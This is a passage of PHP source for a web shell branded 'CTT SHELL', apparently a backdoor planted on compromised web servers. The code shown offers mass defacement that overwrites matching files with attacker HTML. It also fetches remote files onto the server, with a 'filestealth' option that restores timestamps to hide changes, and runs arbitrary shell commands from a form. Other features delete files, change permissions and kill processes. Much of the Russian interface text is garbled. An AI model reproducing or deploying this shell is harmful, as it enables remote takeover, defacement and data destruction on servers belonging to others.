  1214.  if (empty($deface_in)) {$deface_in = $d;}
  1215.  if (empty($deface_name)) {$deface_name = "(.*)"; $deface_name_regexp = 1;}
  1216.  if (empty($deface_text_wwo)) {$deface_text_regexp = 0;}
  1217.  
  1218.  if (!empty($submit))
  1219.  {
  1220.   $found = array();
  1221.   $found_d = 0;
  1222.   $found_f = 0;
  1223.  
  1224.   $text = $deface_text;
  1225.   $text_regexp = $deface_text_regexp;
  1226.   if (empty($text)) {$text = " "; $text_regexp = 1;}
  1227.  
  1228.   $a = array
  1229.   (
  1230. "name"=>$deface_name, "name_regexp"=>$deface_name_regexp,
  1231. "text"=>$text, "text_regexp"=>$text_regxp,
  1232. "text_wwo"=>$deface_text_wwo,
  1233. "text_cs"=>$deface_text_cs,
  1234. "text_not"=>$deface_text_not
  1235.   );
  1236.   $defacetime = getmicrotime();
  1237.   $in = array_unique(explode(";",$deface_in));
  1238.   foreach($in as $v) {ctfsearch($v);}
  1239.   $defacetime = round(getmicrotime()-$defacetime,4);
  1240.   if (count($found) == 0) {echo "<b>No files found!</b>";}
  1241.   else
  1242.   {
  1243. $ls_arr = $found;
  1244. $disp_fullpath = true;
  1245. $act = $dspact = "ls";
  1246.   }
  1247.  }
  1248.  else
  1249.  {
  1250.   if (empty($deface_preview)) {$deface_preview = 1;}
  1251.  
  1252.  }
  1253.  echo "<form method=\"POST\">";
  1254.  if (!$submit) {echo "<big><b>Attention! It's a very dangerous feature, you may lost your data.</b></big><br><br>";}
  1255.  echo "<input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
  1256. <b>Deface for (file/directory name): </b><input type=\"text\" name=\"deface_name\" size=\"".round(strlen($deface_name)+25)."\" value=\"".htmlspecialchars($deface_name)."\">&nbsp;<input type=\"checkbox\" name=\"deface_name_regexp\" value=\"1\" ".gchds($deface_name_regexp,1," checked")."> - regexp
  1257. <br><b>Deface in (explode \";\"): </b><input type=\"text\" name=\"deface_in\" size=\"".round(strlen($deface_in)+25)."\" value=\"".htmlspecialchars($deface_in)."\">
  1258. <br><br><b>Search text:</b><br><textarea name=\"deface_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_text)."</textarea>
  1259. <br><br><input type=\"checkbox\" name=\"deface_text_regexp\" value=\"1\" ".gchds($deface_text_regexp,1," checked")."> - regexp
  1260. &nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_wwo\" value=\"1\" ".gchds($deface_text_wwo,1," checked")."> - <u>w</u>hole words only
  1261. &nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_cs\" value=\"1\" ".gchds($deface_text_cs,1," checked")."> - cas<u>e</u> sensitive
  1262. &nbsp;&nbsp;<input type=\"checkbox\" name=\"deface_text_not\" value=\"1\" ".gchds($deface_text_not,1," checked")."> - find files <u>NOT</u> containing the text
  1263. <br><input type=\"checkbox\" name=\"deface_preview\" value=\"1\" ".gchds($deface_preview,1," checked")."> - <b>PREVIEW AFFECTED FILES</b>
  1264. <br><br><b>Html of deface:</b><br><textarea name=\"deface_html\" cols=\"122\" rows=\"10\">".htmlspecialchars($deface_html)."</textarea>
  1265. <br><br><input type=\"submit\" name=\"submit\" value=\"Deface\"></form>";
  1266.  if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Deface took ".$defacetime." secs</b><br><br>";}
  1267. }
  1268. if ($act == "search")
  1269. {
  1270.  if (empty($search_in)) {$search_in = $d;}
  1271.  if (empty($search_name)) {$search_name = "(.*)"; $search_name_regexp = 1;}
  1272.  if (empty($search_text_wwo)) {$search_text_regexp = 0;}
  1273.  
  1274.  if (!empty($submit))
  1275.  {
  1276.   $found = array();
  1277.   $found_d = 0;
  1278.   $found_f = 0;
  1279.   $a = array
  1280.   (
  1281. "name"=>$search_name, "name_regexp"=>$search_name_regexp,
  1282. "text"=>$search_text, "text_regexp"=>$search_text_regxp,
  1283. "text_wwo"=>$search_text_wwo,
  1284. "text_cs"=>$search_text_cs,
  1285. "text_not"=>$search_text_not
  1286.   );
  1287.   $searchtime = getmicrotime();
  1288.   $in = array_unique(explode(";",$search_in));
  1289.   foreach($in as $v)
  1290.   {
  1291. ctfsearch($v);
  1292.   }
  1293.   $searchtime = round(getmicrotime()-$searchtime,4);
  1294.   if (count($found) == 0) {echo "<b>No files found!</b>";}
  1295.   else
  1296.   {
  1297. $ls_arr = $found;
  1298. $disp_fullpath = true;
  1299. $act = $dspact = "ls";
  1300.   }
  1301.  }
  1302.  echo "<form method=\"POST\">
  1303. <input type=\"hidden\" name=\"d\" value=\"".$dispd."\">
  1304. <b>Search for (file/directory name): </b><input type=\"text\" name=\"search_name\" size=\"".round(strlen($search_name)+25)."\" value=\"".htmlspecialchars($search_name)."\">&nbsp;<input type=\"checkbox\" name=\"search_name_regexp\" value=\"1\" ".gchds($search_name_regexp,1," checked")."> - regexp
  1305. <br><b>Search in (explode \";\"): </b><input type=\"text\" name=\"search_in\" size=\"".round(strlen($search_in)+25)."\" value=\"".htmlspecialchars($search_in)."\">
  1306. <br><br><b>Text:</b><br><textarea name=\"search_text\" cols=\"122\" rows=\"10\">".htmlspecialchars($search_text)."</textarea>
  1307. <br><br><input type=\"checkbox\" name=\"search_text_regexp\" value=\"1\" ".gchds($search_text_regexp,1," checked")."> - regexp
  1308. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_wwo\" value=\"1\" ".gchds($search_text_wwo,1," checked")."> - <u>w</u>hole words only
  1309. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_cs\" value=\"1\" ".gchds($search_text_cs,1," checked")."> - cas<u>e</u> sensitive
  1310. &nbsp;&nbsp;<input type=\"checkbox\" name=\"search_text_not\" value=\"1\" ".gchds($search_text_not,1," checked")."> - find files <u>NOT</u> containing the text
  1311. <br><br><input type=\"submit\" name=\"submit\" value=\"Search\"></form>";
  1312.  if ($act == "ls") {echo "<hr size=\"1\" noshade><b>Search took ".$searchtime." secs</b><br><br>";}
  1313. }
  1314. if ($act == "chmod")
  1315. {
  1316.  $perms = fileperms($d.$f);
  1317.  if (!$perms) {echo "Can't get current mode.";}
  1318.  elseif ($submit)
  1319.  {
  1320.   if (!isset($owner[0])) {$owner[0] = 0;}
  1321.   if (!isset($owner[1])) {$owner[1] = 0; }
  1322.   if (!isset($owner[2])) {$owner[2] = 0;}
  1323.   if (!isset($group[0])) {$group[0] = 0;}
  1324.   if (!isset($group[1])) {$group[1] = 0;}
  1325.   if (!isset($group[2])) {$group[2] = 0;}
  1326.   if (!isset($world[0])) {$world[0] = 0;}
  1327.   if (!isset($world[1])) {$world[1] = 0;}
  1328.   if (!isset($world[2])) {$world[2] = 0;}
  1329.   $sum_owner = $owner[0] + $owner[1] + $owner[2];
  1330.   $sum_group = $group[0] + $group[1] + $group[2];
  1331.   $sum_world = $world[0] + $world[1] + $world[2];
  1332.   $sum_chmod = "0".$sum_owner.$sum_group.$sum_world;
  1333.   $ret = @chmod($d.$f, $sum_chmod);
  1334.   if ($ret) {$act = "ls";}
  1335.   else {echo "<b>��������� ������� ����� (".$d.$f.")</b>: ������<br>";}
  1336.  }
  1337.  else
  1338.  {
  1339.   echo "<center><b>��������� ������� �����</b><br>";
  1340.   $perms = view_perms(fileperms($d.$f));
  1341.   $length = strlen($perms);
  1342.   $owner_r = $owner_w = $owner_x =
  1343.   $group_r = $group_w = $group_x =
  1344.   $world_r = $world_w = $group_x = "";
  1345.  
  1346.   if ($perms[1] == "r") {$owner_r = " checked";} if ($perms[2] == "w") {$owner_w = " checked";}
  1347.   if ($perms[3] == "x") {$owner_x = " checked";} if ($perms[4] == "r") {$group_r = " checked";}
  1348.   if ($perms[5] == "w") {$group_w = " checked";} if ($perms[6] == "x") {$group_x = " checked";}
  1349.   if ($perms[7] == "r") {$world_r = " checked";} if ($perms[8] == "w") {$world_w = " checked";}
  1350.  if ($perms[9] == "x") {$world_x = " checked";}
  1351.   echo "<form method=\"POST\"><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value='".htmlspecialchars($f)."'>
  1352. <input type=hidden name=act value=chmod><input type=hidden name=submit value=1><input type=hidden name='owner[3]' value=no_error>
  1353. <input type=hidden name='group[3]' value=no_error><input type=hidden name='world[3]' value=no_error>
  1354. <table class=table1><tr><td class=td2><table class=table1 align=center width=300 border=0 cellspacing=0 cellpadding=5><tr><td class=td2><b>Owner</b><br><br>
  1355. <input type=checkbox NAME=owner[0] value=4".$owner_r.">Read<br><input type=checkbox NAME=owner[1] value=2".$owner_w.">Write<br>
  1356. <input type=checkbox NAME=owner[2] value=1".$owner_x.">Execute</font></td><td class=td2><b>Group</b><br><br>
  1357. <input type=checkbox NAME=group[0] value=4".$group_r.">Read<br>
  1358. <input type=checkbox NAME=group[1] value=2".$group_w.">Write<br>
  1359. <input type=checkbox NAME=group[2] value=1".$group_x.">Execute</font></td>
  1360. <td class=td2><b>World</b><br><br><input type=checkbox NAME=world[0] value=4".$world_r.">Read<br>
  1361. <input type=checkbox NAME=world[1] value=2".$world_w.">Write<br>
  1362. <input type=checkbox NAME=world[2] value=1".$world_x.">Execute</font></td>
  1363. </tr></table></td></tr><tr align=center><td><input type=submit name=chmod value=\"���������\"></td></tr></table></FORM></center>";
  1364.  }
  1365. }
  1366. if ($act == "upload")
  1367. {
  1368.  $uploadmess = "";
  1369.  $uploadpath = str_replace("\\","/",$uploadpath);
  1370.  if (empty($uploadpath)) {$uploadpath = $d;}
  1371.  elseif (substr($uploadpath,strlen($uploadpath)-1,1) != "/") {$uploadpath .= "/";}
  1372.  if (!empty($submit))
  1373.  {
  1374.   global $HTTP_POST_FILES;
  1375.   $uploadfile = $HTTP_POST_FILES["uploadfile"];
  1376.   if (!empty($uploadfile[tmp_name]))
  1377.   {
  1378. if (empty($uploadfilename)) {$destin = $uploadfile[name];}
  1379. else {$destin = $userfilename;}
  1380. if (!move_uploaded_file($uploadfile[tmp_name],$uploadpath.$destin)) {$uploadmess .= "������, ����������� ���� ".$uploadfile[name]." (�� ����� ����������� \"".$uploadfile[tmp_name]."\" �� \"".$uploadpath.$destin."\"!<br>";}
  1381.   }
  1382.   elseif (!empty($uploadurl))
  1383.   {
  1384. if (!empty($uploadfilename)) {$destin = $uploadfilename;}
  1385. else
  1386. {
  1387.  $destin = explode("/",$destin);
  1388.  $destin = $destin[count($destin)-1];
  1389.  if (empty($destin))
  1390.  {
  1391.   $i = 0;
  1392.   $b = "";
  1393.   while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}}
  1394. }
  1395. if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";}
  1396. else
  1397. {
  1398.  $st = getmicrotime();
  1399.  $content = @file_get_contents($uploadurl);
  1400.  $dt = round(getmicrotime()-$st,4);
  1401.  if (!$content) {$uploadmess .=  "�� ����� ��������� ����!<br>";}
  1402.  else
  1403.  {
  1404.   if ($filestealth) {$stat = stat($uploadpath.$destin);}
  1405.   $fp = fopen($uploadpath.$destin,"w");
  1406.   if (!$fp) {$uploadmess .= "������, ������� ����� ".htmlspecialchars($destin)."!<br>";}
  1407.   else
  1408.   {
  1409. fwrite($fp,$content,strlen($content));
  1410. fclose($fp);
  1411. if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
  1412.   }
  1413.  }
  1414. }
  1415.   }
  1416.  }
  1417.  if ($miniform)
  1418.  {
  1419.   echo "<b>".$uploadmess."</b>";
  1420.   $act = "ls";
  1421.  }
  1422.  else
  1423.  {
  1424.   echo "<b>�������� �����:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$sul."act=upload&d=".urlencode($d)."\" method=\"POST\">
  1425. ��������� ����: <br><input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;���<br>
  1426. ��������� �� URL: <br><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br>
  1427. ��������� ���� ����� � �����: <br><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br>
  1428. ��� �����: <br><input name=uploadfilename size=25>
  1429. <input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;�������������� ��� �����<br><br>
  1430. <input type=\"submit\" name=\"submit\" value=\"���������\">
  1431. </form>";
  1432.  }
  1433. }
  1434. if ($act == "delete")
  1435. {
  1436.  $delerr = "";
  1437.  foreach ($actbox as $v)
  1438.  {
  1439.   $result = false;
  1440.   $result = fs_rmobj($v);
  1441.   if (!$result) {$delerr .= "�� ����� ������� ".htmlspecialchars($v)."<br>";}
  1442.   if (!empty($delerr)) {echo "<b>�������� � ��������:</b><br>".$delerr;}
  1443.  }
  1444.  $act = "ls";
  1445. }
  1446. if ($act == "onedelete")
  1447. {
  1448.  $delerr = "";
  1449.   $result = false;
  1450.   $result = fs_rmobj($f);
  1451.   if (!$result) {$delerr .= "�� ����� ������� ".htmlspecialchars($f)."<br>";}
  1452.   if (!empty($delerr)) {echo "<b>�������� � ��������:</b><br>".$delerr;}
  1453.  $act = "ls";
  1454. }
  1455. if ($act == "onedeleted")
  1456. {
  1457.  $delerr = "";
  1458.   $result = false;
  1459.   $result = fs_rmobj($d+'/'+$f);
  1460.   if (!$result) {$delerr .= "�� ����� ������� ".htmlspecialchars($f)."<br>";}
  1461.   if (!empty($delerr)) {echo "<b>�������� � ��������:</b><br>".$delerr;}
  1462.  $act = "ls";
  1463. }
  1464. if ($act == "deface")
  1465. {
  1466.  $deferr = "";
  1467.  foreach ($actbox as $v)
  1468.  {
  1469.   $data = $deface_html;
  1470.   if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);}
  1471.   $data = str_replace("%%%filename%%%",basename($v),$data);
  1472.   $data = str_replace("%%%filepath%%%",$v,$data);
  1473.   $fp = @fopen($v,"w");
  1474.   fwrite($fp,$data);
  1475.   fclose($fp);
  1476.   if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";}
  1477.   if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;}
  1478.  }
  1479. }
  1480. if (!$usefsbuff)
  1481. {
  1482.  if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";}
  1483. }
  1484. else
  1485. {
  1486.  if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ct_sess_put($sess_data); $act = "ls";}
  1487.  if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ct_sess_put($sess_data); $act = "ls";}
  1488.  if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); ct_sess_put($sess_data); $act = "ls";}
  1489.  
  1490.  if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ct_sess_put($sess_data);}
  1491.  elseif ($actpastebuff)
  1492.  {
  1493.   $psterr = "";
  1494.   foreach($sess_data["copy"] as $k=>$v)
  1495.   {
  1496. $to = $d.basename($v);
  1497. if (!fs_copy_obj($v,$d)) {$psterr .= "�� ����� ����������� ".$v." to ".$to."!<br>";}
  1498. if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1499.   }
  1500.   foreach($sess_data["cut"] as $k=>$v)
  1501.   {
  1502. $to = $d.basename($v);
  1503. if (!fs_move_obj($v,$d)) {$psterr .= "�� ����� ������������� ".$v." to ".$to."!<br>";}
  1504. unset($sess_data["cut"][$k]);
  1505.   }
  1506.   ct_sess_put($sess_data);
  1507.   if (!empty($psterr)) {echo "<b>������������ � ��������:</b><br>".$psterr;}
  1508.   $act = "ls";
  1509.  }
  1510.  elseif ($actarcbuff)
  1511.  {
  1512.   $arcerr = "";
  1513.   if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  1514.   else {$ext = ".tar.gz";}
  1515.  
  1516.   if ($ext == ".tar.gz")
  1517.   {
  1518. $cmdline = "tar cfzv";
  1519.   }
  1520.   $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  1521.   foreach($objects as $v)
  1522.   {
  1523. $v = str_replace("\\","/",$v);
  1524. if (is_dir($v))
  1525. {
  1526.  if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";}
  1527.  $v .= "*";
  1528. }
  1529. $cmdline .= " ".$v;
  1530.   }
  1531.   $ret = `$cmdline`;
  1532.   if (empty($ret)) {$arcerr .= "�� ����� ������� archivator!<br>";}
  1533.   $ret = str_replace("\r\n","\n");
  1534.   $ret = explode("\n",$ret);
  1535.   if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  1536.   foreach($sess_data["cut"] as $k=>$v)
  1537.   {
  1538. if (in_array($v,$ret)) {fs_rmobj($v);}
  1539. unset($sess_data["cut"][$k]);
  1540.   }
  1541.   ct_sess_put($sess_data);
  1542.   if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
  1543.   $act = "ls";
  1544.  }
  1545.  elseif ($actpastebuff)
  1546.  {
  1547.   $psterr = "";
  1548.   foreach($sess_data["copy"] as $k=>$v)
  1549.   {
  1550. $to = $d.basename($v);
  1551. if (!fs_copy_obj($v,$d)) {$psterr .= "�� ����� ����������� ".$v." to ".$to."!<br>";}
  1552. if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1553.   }
  1554.   foreach($sess_data["cut"] as $k=>$v)
  1555.   {
  1556. $to = $d.basename($v);
  1557. if (!fs_move_obj($v,$d)) {$psterr .= "�� ����� ������������� ".$v." to ".$to."!<br>";}
  1558. unset($sess_data["cut"][$k]);
  1559.   }
  1560.   ct_sess_put($sess_data);
  1561.   if (!empty($psterr)) {echo "<b>������������ � ��������:</b><br>".$psterr;}
  1562.   $act = "ls";
  1563.  }
  1564. }
  1565. if ($act == "ls")
  1566. {
  1567.  if (count($ls_arr) > 0) {$list = $ls_arr;}
  1568.  else
  1569.  {
  1570.   $list = array();
  1571.   if ($h = @opendir($d))
  1572.   {
  1573. while ($o = readdir($h)) {$list[] = $d.$o;}
  1574. closedir($h);
  1575.   }
  1576.  }
  1577.  if (count($list) == 0) {echo "<center><b>�� ����� ������� ���������� (".htmlspecialchars($d).")!</b></center>";}
  1578.  else
  1579.  {
  1580.   $tab = array();
  1581.   $amount = count($ld)+count($lf);
  1582.   $vd = "f";
  1583.   if ($vd == "f")
  1584.   {
  1585. $row = array();
  1586. $row[] = "<b><center>���</b>";
  1587. $row[] = "<b><center>������</center></b>";
  1588. $row[] = "<b><center>�������</center></b>";
  1589. if (!$win)
  1590.   {$row[] = "<b><center>��������/������</center></b>";}
  1591. $row[] = "<b><center>�����</center></b>";
  1592. $row[] = "<b><center>�������</center></b>";
  1593.  
  1594. $k = $sort[0];
  1595. if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;}
  1596. if (empty($sort[1])) {$sort[1] = "d";}
  1597. if ($sort[1] != "a")
  1598. {
  1599.  $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$sul."act=img&img=sort_desc\" border=\"0\"></a></center>";
  1600. }
  1601. else
  1602. {
  1603.  $y = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$sul."act=img&img=sort_asc\" border=\"0\"></a></center>";
  1604. }
  1605.  
  1606. $row[$k] .= $y;
  1607. for($i=0;$i<count($row)-1;$i++)
  1608. {
  1609.  if ($i != $k) {$row[$i] = "<a href=\"".$sul."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";}
  1610. }
  1611.  
  1612. $tab = array();
  1613. $tab[cols] = array($row);
  1614. $tab[head] = array();
  1615. $tab[dirs] = array();
  1616. $tab[links] = array();
  1617. $tab[files] = array();
  1618.  
  1619. foreach ($list as $v)
  1620. {
  1621.  $o = basename($v);
  1622.  $dir = dirname($v);
  1623.  
  1624.  if ($disp_fullpath) {$disppath = $v;}
  1625.  else {$disppath = $o;}
  1626.  $disppath = str2mini($disppath,60);
  1627.  
  1628.  if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  1629.  elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  1630.  
  1631.  $uo = urlencode($o);
  1632.  $ud = urlencode($dir);
  1633.  $uv = urlencode($v);
  1634.  
  1635.  $row = array();
  1636.  
  1637. if (is_dir($v))
  1638.  {
  1639.   if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";}
  1640.   else {$type = "DIR";}
  1641.   $row[] =  "<a href=\"".$sul."act=ls&d=".$uv."&sort=".$sort."\"> <img src=\"".$sul."act=img&img=small_dir\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
  1642.   $row[] = $type;
  1643.  }
  1644.  elseif(is_file($v))
  1645.  {
  1646.   $ext = explode(".",$o);
  1647.   $c = count($ext)-1;
  1648.   $ext = $ext[$c];
  1649.   $ext = strtolower($ext);
  1650.   $row[] =  "<a href=\"".$sul."act=f&f=".$uo."&d=".$ud."&\"><img src=\"".$sul."act=img&img=ext_".$ext."\" height=\"16\" width=\"16\" border=\"0\">&nbsp; ".$disppath."</a>";
  1651.   $row[] = view_size(filesize($v));
  1652.  }
  1653.  $row[] = "<center>".date("d.m.Y H:i:s",filemtime($v))."</center>";
  1654.  
  1655.  if (!$win)
  1656.  {
  1657.   $ow = @posix_getpwuid(fileowner($v));
  1658.   $gr = @posix_getgrgid(filegroup($v));
  1659.   $row[] = "<center>".$ow["name"]."/".$gr["name"]."</center>";
  1660.  }
  1661.  
  1662.  if (is_writable($v)) {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\">".view_perms(fileperms($v))."</a>";}
  1663.  else {$row[] = "<a href=\"".$sul."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";}
  1664.  
  1665.  if (is_dir($v)) {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=onedeleted&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
  1666.  else {$row[] = "&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$sul."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$sul."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$sul."act=onedelete&f=".$uo."&d=".$ud."\"><img src=\"".$sul."act=img&img=odel\" title=\"Delete\" height=\"16\" width=\"19\" border=\"0\"></a>";}
  1667.  
  1668.  if (($o == ".") or ($o == "..")) {$tab[head][] = $row;}
  1669.  elseif (is_link($v)) {$tab[links][] = $row;}
  1670.  elseif (is_dir($v)) {$tab[dirs][] = $row;}
  1671.  elseif (is_file($v)) {$tab[files][] = $row;}
  1672. }
  1673.   }
  1674.   $v = $sort[0];
  1675.   function tabsort($a, $b)
  1676.   {
  1677. global $v;
  1678. return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v]));
  1679.   }
  1680.   usort($tab[dirs], "tabsort");
  1681.   usort($tab[files], "tabsort");
  1682.   if ($sort[1] == "a")
  1683.   {
  1684. $tab[dirs] = array_reverse($tab[dirs]);
  1685. $tab[files] = array_reverse($tab[files]);
  1686.   }
  1687.   $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]);
  1688.   echo "<TABLE class=table1  cellSpacing=0 cellPadding=0 width=100% border=0>
  1689. <form method=\"POST\">";
  1690. $smsn=0;
  1691.   foreach($table as $row)
  1692.   {
  1693. $smsn++;
  1694.  if ($smsn!=2 && $smsn!=3) {
  1695. echo "<tr>\r\n";
  1696. foreach($row as $v) {echo "<td class=tds1 bgcolor=#242424>".$v."</td>\r\n";}
  1697. echo "</tr>\r\n";
  1698. }
  1699.  
  1700.   }
  1701.   echo "</table><TABLE height=1% class=table2 cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0>
  1702. <tr class=tr2>
  1703. <td width=8% height=1%><font size=2 color=#000000>
  1704. �����: ".(count($tab[dirs])+count($tab[links]))."</font></td>
  1705. <td width=8% height=1%><font size=2 color=#000000> �����: ".count($tab[files])."</font></td><td height=1% vAlign=top align=right>";
  1706. if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff))
  1707.   {
  1708. echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"��������\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"������ �����\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  1709.   }
  1710.   echo "<select name=\"act\"><option value=\"".$act."\">� ����������:</option>";
  1711.   echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">�������</option>";
  1712.   if ($usefsbuff)
  1713.   {
  1714. echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">��������</option>";
  1715. echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">����������</option>";
  1716. echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">���������</option>";
  1717.   }
  1718.   if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">���������</option>";}
  1719.   echo "</select>&nbsp;<input type=\"submit\" value=\"�����������\">";
  1720.   echo "</form>";
  1721.  
  1722. echo "</td></tr></table>";
  1723. echo "</td></tr></table><br><center><font size=2 color=#aaaaaa>[<a href=http://ctt.void.ru>CTT</a>] SHELL ver ".$shver."</font></center>";
  1724.  }
  1725.  
  1726. }
  1727. if ($act == "cmd")
  1728. {
  1729.  if (!empty($submit))
  1730.  {
  1731.   echo "<b>��������� ���������� ��� �������</b>:<br>";
  1732.   $tmp = ob_get_contents();
  1733.   $olddir = realpath(".");
  1734.   @chdir($d);
  1735.   if ($tmp)
  1736.   {
  1737. ob_clean();
  1738. myshellexec($cmd);
  1739. $ret = ob_get_contents();
  1740. $ret = convert_cyr_string($ret,"d","w");
  1741. ob_clean();
  1742. echo $tmp;
  1743. if ($cmd_txt)
  1744. {
  1745.  $rows = count(explode("
  1746. ",$ret))+1;
  1747.  if ($rows < 10) {$rows = 10;}
  1748.  echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>";
  1749. }
  1750. else {echo $ret;}
  1751.   }
  1752.   else
  1753.   {
  1754. if ($cmd_txt)
  1755. {
  1756.  echo "<br><textarea cols=\"122\" rows=\"15\" readonly>";
  1757.  myshellexec($cmd);
  1758.  echo "</textarea>";
  1759. }
  1760. else {echo $ret;}
  1761.   }
  1762.   @chdir($olddir);
  1763.  }
  1764.  else {echo "<b>������� ����������:</b>";  if (empty($cmd_txt)) {$cmd_txt = true;}}
  1765.  echo "<form action=\"".$sul."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"���������\"><input type=\"hidden\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>";
  1766. }
  1767. if ($act == "ps_aux")
  1768. {
  1769.  echo "<b>��������:</b><br>";
  1770.  if ($win) {
  1771. echo "<pre>";
  1772. system('tasklist');
  1773. echo "</pre>";
  1774. }
  1775.  else
  1776.  {
  1777.   if ($pid)
  1778.   {
  1779. if (!$sig) {$sig = 9;}
  1780. echo "Sending signal ".$sig." to #".$pid."... ";
  1781. $ret = posix_kill($pid,$sig);
  1782. if ($ret) {echo "ok. he is dead, amen.";}
  1783. else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";}
  1784.   }
  1785.   $ret = `ps -aux`;
  1786.   if (!$ret) {echo "Can't execute \"ps -aux\"!";}
  1787.   else
  1788.   {
  1789. $ret = htmlspecialchars($ret);
  1790. $ret = str_replace(""," ",$ret);
  1791. while (ereg("  ",$ret)) {$ret = str_replace("  "," ",$ret);}
  1792. $prcs = explode("\n",$ret);
  1793. $head = explode(" ",$prcs[0]);
  1794. $head[] = "ACTION";
  1795. unset($prcs[0]);
  1796. echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">";
  1797. echo "<tr border=\"1\">";
